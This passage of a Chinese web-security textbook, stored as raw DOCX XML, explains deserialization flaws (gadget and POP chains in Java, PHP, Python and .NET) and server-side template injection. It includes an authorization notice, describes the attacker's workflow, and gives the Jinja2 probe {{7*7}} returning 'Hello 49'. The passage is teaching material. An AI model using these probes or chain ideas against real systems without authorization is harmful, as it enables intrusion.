      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="221"/>
    <w:bookmarkEnd w:id="222"/>
    <w:bookmarkStart w:id="231" w:name="进阶-web反序列化ssti-与-api-安全"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进阶</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Web:反序列化、SSTI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="223" w:name="反序列化与模板注入ssti"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">反序列化与模板注入（SSTI）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">前置依赖框：本节讨论的反序列化漏洞与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SSTI（Server-Side</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Template </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Injection，服务端模板注入）均属于注入类漏洞的延伸，其核心假设违反与第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入、命令注入相同——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">数据与代码的边界被混淆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。读者应已掌握第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基本操作，以及第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章的注入第一性原理（参数化防御、攻击面识别）。本节仅聚焦于反序列化与模板引擎这两种特定上下文，不重复注入共同机理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">授权与隔离声明框：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">本节涉及的所有漏洞探测与利用仅限在读者自建的隔离实验环境、官方授权靶机（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> WebGoat、PortSwigger Academy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">在线实验室、HackTheBox/TryHackMe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">中已获授权的实例）或已取得书面渗透测试授权的目标上进行。严禁在未授权系统上测试反序列化载荷或模板注入载荷。实验网络必须与生产网络及公网严格隔离，虚拟机建议提前创建快照以便回滚。攻击他人计算机信息系统属于违法行为。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用从“无状态”走向“有状态”的过程中，对象序列化成为存储与传输复杂数据结构的标准方式；同时，模板引擎的引入让服务端页面渲染变得灵活高效。然而，这两个机制都分享同一个致命的假设：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">来自客户端的序列化字节流是良性的，或者用户提交的字符串不会被模板引擎当作代码求值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。攻击者站在这一假设的背面：他精心构造的序列化数据一旦被反序列化，就会在应用内部触发意料之外的逻辑链（即</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gadget </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">chain），最终实现远程代码执行；或者他在表单中输入的模板表达式，被毫无防备的模板引擎解析并执行，从而窃取数据、执行系统命令。防御者则必须识别这种“将数据作为代码消费”的深层缺陷，并从架构层面斩断信任。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">反序列化与模板注入（SSTI）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">反序列化漏洞原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“序列化”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是将程序内的对象状态转换为可存储或传输的格式（如二进制流、JSON、XML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）的过程；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“反序列化”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">则是其逆过程——从字节流重建对象。许多</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架在会话管理、缓存、RPC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">调用、API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数传递中广泛使用序列化。当服务端对来自不可信源（例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie、POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">body、序列化</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数）的序列化数据执行反序列化时，若缺乏完整性校验或类型白名单，攻击者可以通过篡改序列化字节流，在反序列化过程中触发目标语言或框架中的“魔术方法”（magic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">methods）或生命周期回调（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">readObject</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__wakeup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__reduce__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），进而串联出一系列可利用的类方法（gadget</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">chain）。值得注意的是，具体的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gadget </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">链高度依赖目标应用的第三方库（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Commons-Collections、Spring、Jackson </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）；本书仅剖析其共性假设，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">绝不提供可直接武器化的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> gadget </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">构造细节</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者视角的典型流程如下：他需要识别一个接受序列化对象的端点（例如一段</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Base64 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编码的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">序列化对象出现在名为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">javax.faces.ViewState</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数中，或一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用反序列化用户传入的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie）。通过发送修改后的字节流，他尝试让目标在反序列化时调用一个已有的类方法，该方法再调用另一个方法，最终链向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Runtime.getRuntime.exec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">、文件读写等危险操作。这就是所谓的“POP（Property</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Oriented </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Programming）链”构造。其根源在于：反序列化机制将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">“对象重建”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">这一内部操作暴露给了外部输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，违反了“永不信任用户输入”的安全准则。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">我们用通俗的类比来理解：好比一家快递公司接收包裹（序列化数据），拆包后根据包裹内的图纸（类定义）自动复现出机器人（对象）。攻击者不遵守图纸，而是伪造了一张图纸，该图纸指示机器人在启动时执行“打开后门”的动作。反序列化漏洞正是这种对“自动重建”逻辑的利用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">主流语言的常见反序列化风险点如下：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ObjectInputStream.readObject</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配合存在危险方法的公用类库。OWASP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将“不安全反序列化”列入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Top </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">10，足见其危害。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">unserialize</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">针对用户可控输入，尤其当应用中定义了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__destruct</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__wakeup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等魔术方法时。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pickle.loads</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">处理不可信数据时，可通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__reduce__</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行任意代码。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">.NET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BinaryFormatter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等在反序列化时同样可能引发代码执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">所有这些机制的共性是：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">反序列化过程本身是图灵完备的，足以执行任意逻辑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，因此任何来自不受信任方的序列化数据都是潜在威胁。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SSTI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务端模板注入的机理更接近经典的命令注入：Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用使用模板引擎（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Jinja2、FreeMarker、Twig、Velocity </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）将动态数据与静态模板合并生成</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">页面。模板引擎通常支持一些简单的表达式求值、变量存取和函数调用。当开发者不小心将用户输入直接拼接进模板字符串，而不是将其作为模板变量传递时，攻击者就可以注入自己的模板表达式，使之在服务端被引擎解析和执行。这就是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSTI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的核心——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">用户输入跨越了数据的边界，成为了模板代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。这与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入中用户输入变成</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代码的逻辑如出一辙（详见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SSTI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的危害程度与特定模板引擎的能力相关。最简单的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSTI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">仅能读取变量（信息泄露），而更强大的引擎则允许执行任意系统命令。例如，在一个使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Jinja2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Python Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用中，若开发者编写了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">template = "Hello " + user_input</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">而不是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">template = "Hello {{ name }}"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，攻击者输入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{{7*7}}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将得到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Hello 49</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
